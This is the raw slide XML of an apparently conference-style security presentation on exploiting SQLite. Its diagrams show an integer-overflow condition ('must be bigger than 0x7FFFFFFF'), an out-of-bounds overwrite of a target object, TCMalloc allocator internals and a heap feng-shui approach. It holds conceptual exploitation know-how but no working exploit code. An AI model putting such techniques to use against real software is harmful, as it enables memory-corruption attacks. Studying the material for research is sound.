          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nPrefix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nSuffix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> must be bigger than 0x7FFFFFFF  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>←  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Restriction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792682" y="2723339"/>
            <a:ext cx="1184987"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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9582535" y="2723339"/>
            <a:ext cx="1772822" cy="500782"/>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rgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Data</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187608" y="2723339"/>
            <a:ext cx="1184987" cy="500782"/>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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ·</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792682" y="3263935"/>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9584569" y="3263935"/>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576457" y="3319479"/>
            <a:ext cx="1296956" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7FFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8873413" y="3504145"/>
            <a:ext cx="709124"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1" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6792682" y="3504145"/>
            <a:ext cx="783775" cy="9172"/>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9582534" y="2723339"/>
            <a:ext cx="979718" cy="500782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6795788" y="2445965"/>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7977669" y="2445965"/>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7020794" y="2268578"/>
            <a:ext cx="662477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6783157" y="2453244"/>
            <a:ext cx="237637"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668983" y="2444275"/>
            <a:ext cx="313449"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9577088" y="2453244"/>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0563704" y="2453244"/>
            <a:ext cx="0" cy="249381"/>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9721128" y="2275857"/>
            <a:ext cx="662477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9583985" y="2460523"/>
            <a:ext cx="157257" cy="2457"/>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0374080" y="2451554"/>
            <a:ext cx="188067" cy="169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4695825" y="1835149"/>
            <a:ext cx="542925" cy="44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Elbow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="3"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238750" y="2056626"/>
            <a:ext cx="2113283" cy="211952"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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4431345" y="2876525"/>
            <a:ext cx="542925" cy="44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6" name="Elbow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="2"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6279205" y="1743081"/>
            <a:ext cx="369332" cy="3522127"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 161896"/>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2373945" y="3876650"/>
            <a:ext cx="542925" cy="44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8" name="Elbow Connector 27"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="2"/>
            <a:endCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5811158" y="58370"/>
            <a:ext cx="1095483" cy="7426985"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20868"/>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a:off x="1381125" y="4897022"/>
            <a:ext cx="1807208" cy="44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1" name="Elbow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3188333" y="2275857"/>
            <a:ext cx="6864034" cy="2842642"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 81585"/>
              <a:gd name="adj2" fmla="val 108042"/>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074297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What is controlled</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7553835" y="3542906"/>
            <a:ext cx="230461" cy="890124"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397799" y="3542907"/>
            <a:ext cx="975952"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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4B4B4B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B4B4B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191492" y="2499211"/>
            <a:ext cx="9790544" cy="29008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Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7553835" y="3542907"/>
            <a:ext cx="3197296" cy="890124"/>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Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7553835" y="3328725"/>
            <a:ext cx="3634508" cy="428363"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFC000"/>
              </a:gs>
              <a:gs pos="27417">
                <a:srgbClr val="E4C758"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="10800000" scaled="1"/>
            <a:tileRect/>
          </a:gra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Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4422709" y="4218848"/>
            <a:ext cx="3361585" cy="428363"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="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Arc 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397799" y="2998609"/>
            <a:ext cx="6156036" cy="1032078"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10798678"/>
              <a:gd name="adj2" fmla="val 21519892"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="15875">
            <a:prstDash val="solid"/>
            <a:headEnd type="triangle" w="lg" len="med"/>
            <a:tailEnd type="triangl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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3682248" y="2586557"/>
            <a:ext cx="1979647" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7FFFFFFF gap</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Curved Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7784296" y="3987968"/>
            <a:ext cx="696057" cy="774788"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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7248592" y="4754958"/>
            <a:ext cx="4695758" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Must contain this 1 byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Can overwrite data in any direction</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8396779" y="3803303"/>
            <a:ext cx="1640969" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Target Object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31058993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910942" y="2577777"/>
            <a:ext cx="5331279" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduction to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQLite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="sqlite icon ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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6123" y="1118781"/>
            <a:ext cx="4573755" cy="4573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726353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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46088" name="Picture 8" descr="buffer overflowì ëí ì´ë¯¸ì§ ê²ìê²°ê³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163" y="931992"/>
            <a:ext cx="6403845" cy="49428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6639823"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>TCMalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> allocator</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279918" y="6214188"/>
            <a:ext cx="7399176" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>* Pictures borrowed from Sean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Heelan’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> slides from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>InfiltrateCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 2011</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54276" name="Picture 4" descr="https://blog.exodusintel.com/wp-content/uploads/2019/01/tcmalloc3.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952576" y="2619976"/>
            <a:ext cx="4286848" cy="2762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7626215"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>TCMalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> allocator</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55300" name="Picture 4" descr="https://blog.exodusintel.com/wp-content/uploads/2019/01/tcmalloc2.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666521" y="1991238"/>
            <a:ext cx="6858957" cy="402011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279918" y="6214188"/>
            <a:ext cx="7399176" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>* Pictures borrowed from Sean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Heelan’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> slides from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>InfiltrateCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 2011</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4141635080"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>TCMalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> allocator</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56322" name="Picture 2" descr="https://blog.exodusintel.com/wp-content/uploads/2019/01/tcmalloc1.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028257" y="2438976"/>
            <a:ext cx="8135485" cy="312463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279918" y="6214188"/>
            <a:ext cx="7399176" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>* Pictures borrowed from Sean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Heelan’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> slides from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>InfiltrateCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 2011</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1499519262"/>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My general approach to Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
